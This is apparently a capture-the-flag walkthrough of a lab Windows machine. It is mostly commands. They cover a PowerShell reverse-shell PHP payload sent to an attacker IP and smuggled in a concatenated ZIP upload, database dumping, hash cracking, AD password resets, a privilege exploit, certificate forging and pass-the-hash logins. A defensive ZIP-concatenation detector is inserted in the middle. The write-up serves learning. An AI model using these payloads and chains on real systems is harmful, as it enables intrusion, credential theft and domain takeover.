Certificate
First of all we need to go to the website [Link] and register and login.
echo '[Link] [Link] [Link]' | sudo tee -a /etc/hosts
If we run gobuster, we can see there is a PHP file called [Link]
gobuster dir -u "[Link]" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-[Link] -t 100 -x
If we go to the website, it says this:
So I fuzzed it in Burp Suite (you can also do it with wfuzz) until I found a valid s_id:
[Link]
In this case I will go to [Link]
Here we have a file upload feature.
Here I crafted my malicious .zip to get a reverse shell.
echo "I love Astro" > [Link]
zip [Link] [Link]
mkdir malicious_files
cd malicious_files
nano [Link]
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object
[Link]('YOURIP',4444); \$stream =
\$[Link](); [byte[]]\$bytes = 0..65535|%{0}; while((\$i =
\$[Link](\$bytes, 0, \$[Link])) -ne 0){; \$data = (New-Object -
TypeName [Link]).GetString(\$bytes,0,\$i); \$sendback =
(iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' +
(pwd).Path + '> '; \$sendbyte =
([[Link]]::ASCII).GetBytes(\$sendback2);
\$[Link](\$sendbyte,0,\$[Link]); \$[Link]()};
\$[Link]()\"");
?>
cd ..
zip -r [Link] malicious_files/
cat [Link] [Link] > [Link]
Now upload the [Link]
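The trick above glues two archives together: the first looks harmless, but an extractor that reads the last end-of-central-directory (EOCD) record sees only the second one. As an added defensive example (not from the original writeup), this Python check flags an uploaded archive that carries more than one EOCD record or whose local file headers are not all listed in the central directory a standard parser uses; the sample archives are constructed inline.

```python
import io
import struct
import zipfile

LOCAL_HDR = b"PK\x03\x04"   # local file header signature
EOCD = b"PK\x05\x06"        # end of central directory signature


def build_zip(entries):
    """Build an in-memory, uncompressed ZIP from {name: bytes} (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def local_header_names(blob):
    """Walk every local file header in the blob, regardless of which
    central directory claims it, and return the file names found."""
    names = []
    pos = blob.find(LOCAL_HDR)
    while pos != -1:
        # name length at offset 26, extra field length at offset 28, name at 30
        name_len, extra_len = struct.unpack_from("<HH", blob, pos + 26)
        names.append(blob[pos + 30:pos + 30 + name_len].decode("utf-8", "replace"))
        pos = blob.find(LOCAL_HDR, pos + 30 + name_len + extra_len)
    return names


def analyse_zip(blob):
    """Return (eocd_count, hidden): how many EOCD records the blob carries and
    which local entries are absent from the central directory a standard
    parser (here Python's zipfile, which uses the last EOCD) will list."""
    eocd_count = blob.count(EOCD)
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        listed = set(zf.namelist())
    hidden = [n for n in local_header_names(blob) if n not in listed]
    return eocd_count, hidden


def is_concatenated_zip(blob):
    """True when the archive looks like two ZIPs glued together."""
    eocd_count, hidden = analyse_zip(blob)
    return eocd_count > 1 or bool(hidden)


if __name__ == "__main__":
    legit = build_zip({"notes.txt": b"I love Astro\n"})
    glued = legit + build_zip({"files/readme.txt": b"second archive\n"})
    print(is_concatenated_zip(legit), is_concatenated_zip(glued))  # False True
```

Signature scanning is a heuristic (compressed data can contain these byte patterns by chance), so treat a hit as a reason to reject or quarantine the upload and inspect it, not as proof by itself.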
To trigger the PHP execution, the upload generates a link, so click it. In my case it is
[Link]
Then we need to change the URL like this:
[Link]
[Link]
Before visiting it, we set up our listener: nc -nlvp 4444
We get a shell as xamppuser. Here we need to go up a few directories and read
[Link]
I crafted this command to retrieve the users.
C:\xampp\mysql\bin\[Link] -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D Certificate_WEBAPP_DB -e "SELECT * FROM users;"
This is the result.
Here we need to focus on Sara.B's hash; save it into [Link]
Then crack it with hashcat. I used this command:
hashcat -a 0 -m 3200 [Link] /usr/share/wordlists/[Link] -O
We get Sara.B's password: Blink182.
First of all I ran BloodHound to learn more about this AD.
bloodhound-python -u 'Sara.B' -p 'Blink182' -d [Link] -c All --zip -ns [Link]
Once in BloodHound, if we search for Sara.B and scroll down we can see Transitive Object Control.
Here we can see the following graph, which means that Sara.B is a member of Account Operators.
If we go to the Account Operators group and then to Reachable High Value Targets,
in this graph we can see that this group has GenericAll over [Link]
To abuse that we can simply run this command:
net rpc password "[Link]" "newP@ssword2022" -U "[Link]"/"Sara.B"%"Blink182" -S [Link]
Now we can log in via WinRM with these credentials and we are in. The flag is located in
C:\Users\[Link]\Desktop\[Link]
For root, first we need to change Ryan.K's password and log in via WinRM.
This is the command I used:
net rpc password "Ryan.K" "newP@ssword2022" -U "[Link]"/"Sara.B"%"Blink182" -S [Link]
Once in the WinRM session, if we run the command whoami /priv
we can see that Ryan.K has SeManageVolumePrivilege. To abuse that we can simply upload this .exe:
[Link]
Download the .exe and upload it
If we execute it we can see the following output.
Running this exploit means that Ryan.K now has Full Control over C:
After this we can simply run the following command.
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\[Link]
Now we can download this [Link] to our machine.
With this [Link] we can forge our [Link]
So I ran this command:
certipy forge -ca-pfx [Link] \
-upn 'administrator@[Link]' \
-subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' \
-out forged_admin.pfx
The final step is to use certipy auth to get the Administrator hash.
certipy auth -pfx forged_admin.pfx \
-dc-ip [Link] \
-username 'administrator' \
-domain '[Link]'
Now we can log in via evil-winrm or psexec. I will show both methods in case one fails.
evil-winrm -i [Link] -u administrator -H 'd803303515bf814ac14c5f1702abh866'
impacket-psexec 'Administrator@[Link]' -hashes 'aad3b435b51404eeaad3b435b51404ee:d803303515bf814ac14c5f1702abh866'
I changed the hashes :) so I make sure everyone does this machine themselves.